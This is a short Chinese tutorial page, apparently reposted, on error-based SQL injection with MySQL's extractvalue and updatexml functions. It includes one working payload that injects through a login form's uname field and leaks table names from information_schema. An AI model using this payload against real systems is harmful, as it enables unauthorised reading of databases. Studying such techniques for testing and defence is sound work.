Java教程

sql注入-报错注入

本文主要是介绍sql注入-报错注入,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

extractvalue函数 和 updatexml函数

  • EXTRACTVALUE (XML_document, XPath_string); 

第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 

第二个参数:XPath_string (Xpath格式的字符串). 

作用:从目标XML中返回包含所查询值的字符串

  • UPDATEXML (XML_document, XPath_string, new_value); 

第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 

第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 

第三个参数:new_value,String格式,替换查找到的符合条件的数据 

作用:改变文档中符合条件的节点的值

 

  • extractvalue函数

通过报错判断注入类型为单引号注入

 

调整输入使其不再报错

获取字段列数

 

 

 

 uname=' union select 1,extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = database() limit 0,1))) %23 &passwd=admin&submit=Submit

 

 

 

 

 

 

 

updatexml函数

 

这篇关于sql注入-报错注入的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!